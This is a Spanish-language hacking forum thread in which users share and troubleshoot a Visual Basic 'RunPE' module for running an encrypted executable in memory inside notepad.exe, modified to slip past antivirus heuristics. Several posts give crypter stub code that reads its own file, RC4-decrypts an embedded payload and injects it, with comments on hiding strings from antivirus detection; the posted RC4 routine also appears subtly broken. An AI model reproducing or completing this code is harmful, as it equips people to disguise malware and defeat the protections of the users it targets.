RunPE - Sin Llamada a APIs Externas

D@rB-15

por D@rB-15 Se conecta desde un manicomio

Esta versión del RunPE fue modificada por Karcrack y SqUeEzEr.
No utiliza mas APIs externas, asi que adios heuristica
Salu2
NOTA:
los programas que utilizen esta version del RunPE deben ser compilados a P-CODE
Descarga:
[Enlace externo eliminado para invitados]
NO RAPIDSHIT!

"Me saltó el avira cuando estaba mirando la foto de slandg... ¿como puedo modearlo? " - Skillmax

irux

por irux Delirios esporádicos

pero seria nlfpkgnrj yo, strconv(datosss(1),vbfromunicode),vbnullstring???

D@rB-15

por D@rB-15 Se conecta desde un manicomio

irux escribió:pero seria nlfpkgnrj yo, strconv(datosss(1),vbfromunicode),vbnullstring???

Recuerda que es un Módulo de Clase asi que primero tienes que definir una variable:

Dim C As New Class1 'o el nombre del modulo de clase

Private Sub Form_Load()
C.RunPE LoadExe(App.Path & "\" & App.EXEName & ".exe"), "C:\windows\system32\notepad.exe"
End Sub

'se me olvido añadir esta funcion perdon
Public Function LoadExe(ByVal sPath As String) As Byte()
Dim bvTmp() As Byte
Open sPath For Binary As #1
ReDim bvTmp(LOF(1) - 1)
Get #1, , bvTmp
Close #1
LoadExe = bvTmp
End Function

"Me saltó el avira cuando estaba mirando la foto de slandg... ¿como puedo modearlo? " - Skillmax

Xpro · Mensajes: 1416 Registrado: 13 Sep 2008, 19:00 Ubicación: Polo Oeste

por Xpro Usa camisa de fuerza

Entonces, según la linea que leí, exe, lo inyectad en el notepad de windows

Thansk tio en HH creo que ya hay algunos con el rtvmovemeory y el writeprocess modificado....

Saludos !

http://img844.imageshack.us/img844/8088/mujerrara.jpg
http://img715.imageshack.us/img715/5813/tigree.png
http://img830.imageshack.us/img830/6484/camaleon.png
http://img839.imageshack.us/img839/4944/tigrev2.jpg
http://img843.imageshack.us/img843/443/spidermanxn.png
http://www.youtube.com/watch?v=wHYYkciIKE0

Hacker_Zero

por Hacker_Zero Delirios esporádicos

Bueno, si llama a apis externas, no las importa que es diferente. Las busca con su propio getprocaddress y luego las llama, pero de adios a las heurísticas nada . De todas formas buen trabajo el de los 2 .

Saludos

davidad · Mensajes: 489 Registrado: 28 Sep 2008, 17:09 Ubicación: En tu LAN!

por davidad Esquizofrénico

tioooooo mu wen y muxas gracias x compartir!!!!

En 1º en 2º o en 3º BETICO hasta que muera

cobein

por cobein Sin síntomas

Vamos a aclarar un poco las cosas, la modificacion que Karcrack hizo fue reemplazar varias de las llamadas a kernel32 por las de ntdll y la modificacion de SqUeEzEr fue cambiar RtlMoveMemory por vbaCopyBytes.

El modulo lo hice yo y si requiere de al menos una api para poder copiar bytes.

kerberos5 · Mensajes: 38 Registrado: 04 Nov 2008, 19:14 Ubicación: Roma - Italia

por kerberos5 Sin síntomas

Perdone la pregunta .... Me encantó la clase y formar un Crypter básicos y la sintaxis para iniciar el ejecutable se debe esto, pero me da error de compilación.

Código: Seleccionar todo

C.RunPE LoadExe(App.Path & "\" & App.EXEName & ".exe", StrConv(sData(1), vbFromUnicode), vbNullString)

error.jpg

No tiene los permisos requeridos para ver los archivos adjuntos a este mensaje.

enjoy
by
Kerberos5 Alias 4sp1d3
My Web Site http://www.sendmailer.altervista.org/

kerberos5 · Mensajes: 38 Registrado: 04 Nov 2008, 19:14 Ubicación: Roma - Italia

por kerberos5 Sin síntomas

cobein escribió:Vamos a aclarar un poco las cosas, la modificacion que Karcrack hizo fue reemplazar varias de las llamadas a kernel32 por las de ntdll y la modificacion de SqUeEzEr fue cambiar RtlMoveMemory por vbaCopyBytes.

El modulo lo hice yo y si requiere de al menos una api para poder copiar bytes.

@quote

[Enlace externo eliminado para invitados]

this is the code created of BUNNN, but it's encrypted and it's not clear

enjoy
by
Kerberos5 Alias 4sp1d3
My Web Site http://www.sendmailer.altervista.org/

D@rB-15

por D@rB-15 Se conecta desde un manicomio

kerberos5 escribió:Perdone la pregunta .... Me encantó la clase y formar un Crypter básicos y la sintaxis para iniciar el ejecutable se debe esto, pero me da error de compilación.
Código: Seleccionar todo
C.RunPE LoadExe(App.Path & "\" & App.EXEName & ".exe", StrConv(sData(1), vbFromUnicode), vbNullString)
error.jpg

C.RunPE LoadExe(App.Path & "\" & App.EXEName & ".exe"), StrConv(sData(1), vbFromUnicode)

Debria funcionar ahora

"Me saltó el avira cuando estaba mirando la foto de slandg... ¿como puedo modearlo? " - Skillmax

kerberos5 · Mensajes: 38 Registrado: 04 Nov 2008, 19:14 Ubicación: Roma - Italia

por kerberos5 Sin síntomas

nothing gives me error

error2.jpg

No tiene los permisos requeridos para ver los archivos adjuntos a este mensaje.

enjoy
by
Kerberos5 Alias 4sp1d3
My Web Site http://www.sendmailer.altervista.org/

kerberos5 · Mensajes: 38 Registrado: 04 Nov 2008, 19:14 Ubicación: Roma - Italia

por kerberos5 Sin síntomas

D@rB-15 escribió:
kerberos5 escribió:Perdone la pregunta .... Me encantó la clase y formar un Crypter básicos y la sintaxis para iniciar el ejecutable se debe esto, pero me da error de compilación.
Código: Seleccionar todo
C.RunPE LoadExe(App.Path & "\" & App.EXEName & ".exe", StrConv(sData(1), vbFromUnicode), vbNullString)
error.jpg
C.RunPE LoadExe(App.Path & "\" & App.EXEName & ".exe"), StrConv(sData(1), vbFromUnicode)
Debria funcionar ahora

share the source.... i use the simple crypter of skyweb...do you understand is the error?

tnk

RunTime basic crypter tutorial.rar

No tiene los permisos requeridos para ver los archivos adjuntos a este mensaje.

enjoy
by
Kerberos5 Alias 4sp1d3
My Web Site http://www.sendmailer.altervista.org/

xtreme · Mensajes: 4 Registrado: 10 Jul 2009, 00:14

por xtreme Sin síntomas

No entiendo como usarlo, yo tengo el source del stub de skyweb :

Tiene dos Modulos (stubX,runPE)

Código: Seleccionar todo

'MODULO STUBX :

'PD: Quite el Formulario Principal para que el Stub pese menos pero ustedes pueden Dejarlo y hacerlo con el Form!
'Lo primero que haremos sera autoabrirnos Binariamente y leer los datos que se nos han puesto!


Sub Main()
Dim YO As String, Datos As String, sData() As String

YO = App.Path & "\" & App.EXEName & ".exe" 'Aqui solo declaramos esta String para no tener que estar poniendo eso tan largo cada vez que lo usemos!

Open YO For Binary As #1 'Nos Autoabrimos!
Datos = Space(LOF(1)) 'Obtenemos Los datos de El Stub
Get #1, , Datos
Close #1 'Nos cerramos xD!

'Ahora ya hemos obtenido los datos del Stub Pero Lo que obtenemos en verdad es

' Stub & Archivo encriptado por lo que usaremos el Delimitador que antes pusimos para separar esos datos y poder Utilizarlos!

sData() = Split(Datos, "##$$##") 'Aki lo que hacemos es delimitar los Archivos es decir

'sData(0) = Stub      sData(1) = Archivo Encriptado !
'Por lo que ahora agregamos el RunPe que se utiliza para Ejecutar un Archivo cualquiera directamente en Memoria que eso es lo que hace que sea RunTime porque no necesita
'extraerese en ningun directorio sino que va directo a la memoria! ;)
'COmo veran ahi esta el RunPE sin Encriptar por lo que ustedes tendran que hacerse para encriptar todos los Strings que estan entre las "" menos las APIS por suspuesto para evitar que ls Antiirus Detecten las APIS por Heuristica!
'Bueno Ahora lo que haremos es desencriptar los archivos para despues ejecutarnos en Memoria!
'sData(2) = Contraseña definida por el usuario!

sData(1) = RC4(sData(1), sData(2)) 'Aki cogemos los datos encriptados y los desencriptamos!

Injec YO, StrConv(sData(1), vbFromUnicode), vbNullString 'Nos ejecutamos en memoria convirtiendo esos datos desde Unicode!

'Pues ya esta encriptado todo y hecho el Stub Ahora solo lo Guardamos y Compilamos haber que pasa!
'Para que el Stub pese menos podemos compilarlo en P-Code lo que hace que el Stub Libere una buena parte de Tamaño y se minimize a 16 o 12 kb
 
End Sub


Public Function RC4(ByVal Data As String, ByVal Password As String) As String
On Error Resume Next
Dim F(0 To 255) As Integer, X, Y As Long, Key() As Byte
Key() = StrConv(Password, vbFromUnicode)
For X = 0 To 255
    Y = (Y + F(X) + Key(X Mod Len(Password))) Mod 256
    F(X) = X
Next X
Key() = StrConv(Data, vbFromUnicode)
For X = 0 To Len(Data)
    Y = (Y + F(Y) + 1) Mod 256
    Key(X) = Key(X) Xor F(Temp + F((Y + F(Y)) Mod 254))
Next X
RC4 = StrConv(Key, vbUnicode)
End Function

Como lo puedo adaptar a este RunPE sin llamada a APIs externas ?

Al agregar el nuevo runpe (el que no llama a las APIS externas) y cambiar la funcion Inject por nlfpkgnrj me tira muchos errores de compilacion.

Alguien podria darme una idea o el codigo de este RunPE adaptado al stub de skyweb ?

Desde ya,
Muchas gracias

lord.of.da.flies

por lord.of.da.flies Delirios esporádicos

A mi también me interesaria saber como implementar este método correctamente en el stub. Tengo eso:

Código: Seleccionar todo

Sub Main()
Dim YOM As String, info As String, MData1() As String, C As New Class1

YOM = App.Path & StrReverse(StrReverse("\")) & App.EXEName & StrReverse(StrReverse(".exe"))

Open YOM For Binary As #1
info = Space(LOF(1))
Get #1, , info
Close #1

MData1() = Split(info, StrReverse("#^$=#$/"))

MData1(1) = RC4(MData1(1), StrReverse("321aloh"))

C.RunPE LoadExe(App.Path & "\" & App.EXEName & ".exe"), "C:\windows\system32\notepad.exe"
End Sub

Es nadamás una parte, también esta lo de loadexe y la encriptación rc4. Pero sige sin funcionar, me da el famoso indice fuera del intervalo algo así. Creo que debe ser por lo de StrConv(sData(1), vbFromUnicode), vbNullString, pero no se como ponerlo. Muchas gracias, saludos.

thearing · Mensajes: 49 Registrado: 12 Feb 2009, 03:47

por thearing Sin síntomas

No encuentro la funncion injec o no se usa con este rumpe :S

RunPE - Sin Llamada a APIs Externas

Temas similares

Links sobre el tema

Variantes de tema

RunPE - Sin Llamada a APIs Externas

Mostrar mensajes previos

Ordenar por

Temas similares

Links sobre el tema

Variantes de tema